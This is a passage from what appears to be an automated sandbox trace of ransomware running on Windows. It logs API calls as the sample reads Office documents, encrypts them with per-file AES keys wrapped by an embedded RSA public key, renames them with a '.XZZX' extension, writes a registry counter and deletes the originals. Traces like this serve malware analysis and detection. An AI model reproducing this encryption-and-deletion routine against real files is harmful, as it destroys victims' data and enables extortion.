lpNumberOfBytesWritten=0x3f8e438*=0x12, lpOverlapped=0x0) returned 1 [0035.737] SetFilePointer (in: hFile=0x434, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4df4 [0035.737] WriteFile (in: hFile=0x434, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x3f8e438*=0x5, lpOverlapped=0x0) returned 1 [0035.737] SetFilePointer (in: hFile=0x434, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4df9 [0035.737] SetErrorMode (uMode=0x1) returned 0x1 [0035.737] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0035.737] OutputDebugStringW (lpOutputString="end") [0035.737] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----w0Íâ\x03`Õø\x03â", cchString=0x0, dwFlags=0x0, pbBinary=0x3f8dbf4, pcbBinary=0x3f8d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3f8dbf4, pcbBinary=0x3f8d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0035.737] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x3f8dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x3f8d3dc, pcbStructInfo=0x3f8d3d8 | out: pvStructInfo=0x3f8d3dc, pcbStructInfo=0x3f8d3d8) returned 1 [0035.737] CryptAcquireContextW (in: phProv=0x3f8d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3f8d3e4*=0x3eb200) returned 1 [0035.738] CryptImportPublicKeyInfo (in: hCryptProv=0x3eb200, dwCertEncodingType=0x1, pInfo=0x3dd1a48*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd1a78*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd1a80*, PublicKey.cUnusedBits=0x0), phKey=0x3f8d3ec | out: phKey=0x3f8d3ec*=0x324cf8) returned 1 [0035.738] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0035.738] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0035.738] CryptEncrypt (in: hKey=0x324cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3f8d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x3f8d3f0*=0x80) returned 1 [0035.738] CryptEncrypt (in: hKey=0x324cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3eb288*, pdwDataLen=0x3f8d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3eb288*, pdwDataLen=0x3f8d3e8*=0x80) returned 1 [0035.738] WriteFile (in: hFile=0x434, lpBuffer=0x3eb288*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x3eb288*, lpNumberOfBytesWritten=0x3f8e438*=0x80, lpOverlapped=0x0) returned 1 [0035.738] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0035.738] WriteFile (in: hFile=0x434, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x3f8e438*=0x5, lpOverlapped=0x0) returned 1 [0035.738] GetUserNameW (in: lpBuffer=0x3f8e1f8, pcbBuffer=0x3f8dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x3f8dfe0) returned 1 [0035.739] wsprintfW (in: param_1=0x3f8dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0035.739] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x3f8dfe4 | out: phkResult=0x3f8dfe4*=0x438) returned 0x0 [0035.739] RegQueryValueExW (in: hKey=0x438, lpValueName="E1010314", lpReserved=0x0, lpType=0x3f8dfd8, lpData=0x3f8dfec, lpcbData=0x3f8dfdc*=0x4 | out: lpType=0x3f8dfd8*=0x4, lpData=0x3f8dfec*=0xc, lpcbData=0x3f8dfdc*=0x4) returned 0x0 [0035.739] RegCloseKey (hKey=0x438) returned 0x0 [0035.739] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x3f8dfe8 | out: phkResult=0x3f8dfe8*=0x438) returned 0x0 [0035.739] RegSetValueExW (in: hKey=0x438, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x3f8dfec*=0xd, cbData=0x4 | out: lpData=0x3f8dfec*=0xd) returned 0x0 [0035.739] RegCloseKey (hKey=0x438) returned 0x0 [0035.739] VirtualFree (lpAddress=0x4080000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0035.739] VirtualFree (lpAddress=0x4090000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0035.740] CloseHandle (hObject=0x434) returned 1 [0035.740] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0035.741] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0035.741] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4geU.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4geu.pptx")) returned 1 [0035.742] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4geU.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4geu.pptx")) returned 0 Thread: id = 104 os_tid = 0x72c [0035.742] lstrcpyA (in: lpString1=0x42cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0035.742] lstrcpyW (in: lpString1=0x42cf460, lpString2="5MzXbIREhTTTaeobss.pptx" | out: lpString1="5MzXbIREhTTTaeobss.pptx") returned="5MzXbIREhTTTaeobss.pptx" [0035.742] lstrcpyW (in: lpString1=0x42ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0035.742] SetErrorMode (uMode=0x1) returned 0x1 [0035.742] lstrcpyW (in: lpString1=0x42cf860, lpString2="5MzXbIREhTTTaeobss.pptx" | out: lpString1="5MzXbIREhTTTaeobss.pptx") returned="5MzXbIREhTTTaeobss.pptx" [0035.742] CoCreateGuid (in: pguid=0x42ce440 | out: pguid=0x42ce440*(Data1=0x64f68811, Data2=0x4e5e, Data3=0x4926, Data4=([0]=0xbf, [1]=0x8a, [2]=0xeb, [3]=0xd4, [4]=0xe0, [5]=0xb2, [6]=0x47, [7]=0xd7))) returned 0x0 [0035.742] wsprintfW (in: param_1=0x42cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5MzXbIREhTTTaeobss.pptx") returned 67 [0035.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x42cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0035.743] wsprintfW (in: param_1=0x42ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2FFB243E16646FF464F688111A91543C.XZZX") returned 81 [0035.743] StrStrW (lpFirst="5MzXbIREhTTTaeobss.pptx", lpSrch="XZZX") returned 0x0 [0035.743] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5MzXbIREhTTTaeobss.pptx", dwFileAttributes=0x20) returned 1 [0035.743] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5MzXbIREhTTTaeobss.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5mzxbirehtttaeobss.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0035.743] ReadFile (in: hFile=0x42c, lpBuffer=0x3e1aed8, nNumberOfBytesToRead=0xf270, lpNumberOfBytesRead=0x42ce418, lpOverlapped=0x0 | out: lpBuffer=0x3e1aed8*, lpNumberOfBytesRead=0x42ce418*=0xf270, lpOverlapped=0x0) returned 1 [0035.743] CloseHandle (hObject=0x42c) returned 1 [0035.743] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e50000 [0035.744] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3e60000 [0035.744] SetErrorMode (uMode=0x1) returned 0x1 [0035.744] lstrcpyW (in: lpString1=0x42ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0035.744] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3eb310) returned 1 [0035.746] CryptGenKey (in: hProv=0x3eb310, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x324c38) returned 1 [0035.823] CryptExportKey (in: hKey=0x324c38, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x42ce41c | out: pbData=0x0*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0035.823] CryptExportKey (in: hKey=0x324c38, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3e60000, pdwDataLen=0x42ce41c | out: pbData=0x3e60000*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0035.823] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0035.823] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0035.823] CryptDestroyKey (hKey=0x324c38) returned 1 [0035.823] CryptReleaseContext (hProv=0x3eb310, dwFlags=0x0) returned 1 [0035.824] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2FFB243E16646FF464F688111A91543C.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2ffb243e16646ff464f688111a91543c.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0035.824] WriteFile (in: hFile=0x42c, lpBuffer=0x3e1aed8*, nNumberOfBytesToWrite=0xf270, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x3e1aed8*, lpNumberOfBytesWritten=0x42ce438*=0xf270, lpOverlapped=0x0) returned 1 [0035.825] SetFilePointer (in: hFile=0x42c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xf270 [0035.825] WriteFile (in: hFile=0x42c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0035.825] SetFilePointer (in: hFile=0x42c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xf275 [0035.825] WriteFile (in: hFile=0x42c, lpBuffer=0x42cf860*, nNumberOfBytesToWrite=0x2e, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42cf860*, lpNumberOfBytesWritten=0x42ce438*=0x2e, lpOverlapped=0x0) returned 1 [0035.825] SetFilePointer (in: hFile=0x42c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xf2a3 [0035.825] WriteFile (in: hFile=0x42c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0035.825] SetFilePointer (in: hFile=0x42c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xf2a8 [0035.825] SetErrorMode (uMode=0x1) returned 0x1 [0035.825] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0035.825] OutputDebugStringW (lpOutputString="end") [0035.826] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wXe5", cchString=0x0, dwFlags=0x0, pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0035.826] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x42cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8 | out: pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8) returned 1 [0035.826] CryptAcquireContextW (in: phProv=0x42cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x42cd3e4*=0x3eb310) returned 1 [0035.826] CryptImportPublicKeyInfo (in: hCryptProv=0x3eb310, dwCertEncodingType=0x1, pInfo=0x3dd1b18*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd1b48*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd1b50*, PublicKey.cUnusedBits=0x0), phKey=0x42cd3ec | out: phKey=0x42cd3ec*=0x324d38) returned 1 [0035.826] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0035.827] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0035.827] CryptEncrypt (in: hKey=0x324d38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x42cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x42cd3f0*=0x80) returned 1 [0035.827] CryptEncrypt (in: hKey=0x324d38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3eb398*, pdwDataLen=0x42cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3eb398*, pdwDataLen=0x42cd3e8*=0x80) returned 1 [0035.827] WriteFile (in: hFile=0x42c, lpBuffer=0x3eb398*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x3eb398*, lpNumberOfBytesWritten=0x42ce438*=0x80, lpOverlapped=0x0) returned 1 [0035.827] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0035.827] WriteFile (in: hFile=0x42c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0035.827] GetUserNameW (in: lpBuffer=0x42ce1f8, pcbBuffer=0x42cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x42cdfe0) returned 1 [0035.827] wsprintfW (in: param_1=0x42cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0035.827] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe4 | out: phkResult=0x42cdfe4*=0x438) returned 0x0 [0035.827] RegQueryValueExW (in: hKey=0x438, lpValueName="E1010314", lpReserved=0x0, lpType=0x42cdfd8, lpData=0x42cdfec, lpcbData=0x42cdfdc*=0x4 | out: lpType=0x42cdfd8*=0x4, lpData=0x42cdfec*=0xd, lpcbData=0x42cdfdc*=0x4) returned 0x0 [0035.827] RegCloseKey (hKey=0x438) returned 0x0 [0035.827] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe8 | out: phkResult=0x42cdfe8*=0x438) returned 0x0 [0035.828] RegSetValueExW (in: hKey=0x438, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x42cdfec*=0xe, cbData=0x4 | out: lpData=0x42cdfec*=0xe) returned 0x0 [0035.828] RegCloseKey (hKey=0x438) returned 0x0 [0035.828] VirtualFree (lpAddress=0x3e50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0035.828] VirtualFree (lpAddress=0x3e60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0035.828] CloseHandle (hObject=0x42c) returned 1 [0035.829] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0035.830] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0035.830] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5MzXbIREhTTTaeobss.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5mzxbirehtttaeobss.pptx")) returned 1 [0035.831] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5MzXbIREhTTTaeobss.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5mzxbirehtttaeobss.pptx")) returned 0 Thread: id = 105 os_tid = 0x43c [0035.877] lstrcpyA (in: lpString1=0x3f8fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0035.877] lstrcpyW (in: lpString1=0x3f8f460, lpString2="8HoT4SPBYbm.xlsx" | out: lpString1="8HoT4SPBYbm.xlsx") returned="8HoT4SPBYbm.xlsx" [0035.877] lstrcpyW (in: lpString1=0x3f8e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0035.877] SetErrorMode (uMode=0x1) returned 0x1 [0035.877] lstrcpyW (in: lpString1=0x3f8f860, lpString2="8HoT4SPBYbm.xlsx" | out: lpString1="8HoT4SPBYbm.xlsx") returned="8HoT4SPBYbm.xlsx" [0035.877] CoCreateGuid (in: pguid=0x3f8e440 | out: pguid=0x3f8e440*(Data1=0x9cb9477c, Data2=0x7a73, Data3=0x4055, Data4=([0]=0x86, [1]=0x5e, [2]=0xbc, [3]=0x6e, [4]=0x12, [5]=0xef, [6]=0x17, [7]=0x3e))) returned 0x0 [0035.877] wsprintfW (in: param_1=0x3f8ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8HoT4SPBYbm.xlsx") returned 60 [0035.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x3f8fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0035.877] wsprintfW (in: param_1=0x3f8e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B34C34B41EC5682F9CB9477C22BE4C77.XZZX") returned 81 [0035.877] StrStrW (lpFirst="8HoT4SPBYbm.xlsx", lpSrch="XZZX") returned 0x0 [0035.877] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8HoT4SPBYbm.xlsx", dwFileAttributes=0x20) returned 1 [0035.878] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8HoT4SPBYbm.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8hot4spbybm.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0035.878] ReadFile (in: hFile=0x434, lpBuffer=0x3e2cd28, nNumberOfBytesToRead=0x14225, lpNumberOfBytesRead=0x3f8e418, lpOverlapped=0x0 | out: lpBuffer=0x3e2cd28*, lpNumberOfBytesRead=0x3f8e418*=0x14225, lpOverlapped=0x0) returned 1 [0035.879] CloseHandle (hObject=0x434) returned 1 [0035.879] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x4080000 [0035.880] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4090000 [0035.880] SetErrorMode (uMode=0x1) returned 0x1 [0035.880] lstrcpyW (in: lpString1=0x3f8e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0035.880] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3eb420) returned 1 [0035.883] CryptGenKey (in: hProv=0x3eb420, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x324c38) returned 1 [0035.992] CryptExportKey (in: hKey=0x324c38, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x3f8e41c | out: pbData=0x0*, pdwDataLen=0x3f8e41c*=0x94) returned 1 [0035.992] CryptExportKey (in: hKey=0x324c38, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4090000, pdwDataLen=0x3f8e41c | out: pbData=0x4090000*, pdwDataLen=0x3f8e41c*=0x94) returned 1 [0035.992] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0035.993] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0035.993] CryptDestroyKey (hKey=0x324c38) returned 1 [0035.993] CryptReleaseContext (hProv=0x3eb420, dwFlags=0x0) returned 1 [0035.993] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B34C34B41EC5682F9CB9477C22BE4C77.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b34c34b41ec5682f9cb9477c22be4c77.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0035.994] WriteFile (in: hFile=0x434, lpBuffer=0x3e2cd28*, nNumberOfBytesToWrite=0x14225, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x3e2cd28*, lpNumberOfBytesWritten=0x3f8e438*=0x14225, lpOverlapped=0x0) returned 1 [0035.995] SetFilePointer (in: hFile=0x434, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x14225 [0035.995] WriteFile (in: hFile=0x434, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x3f8e438*=0x5, lpOverlapped=0x0) returned 1 [0035.995] SetFilePointer (in: hFile=0x434, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, 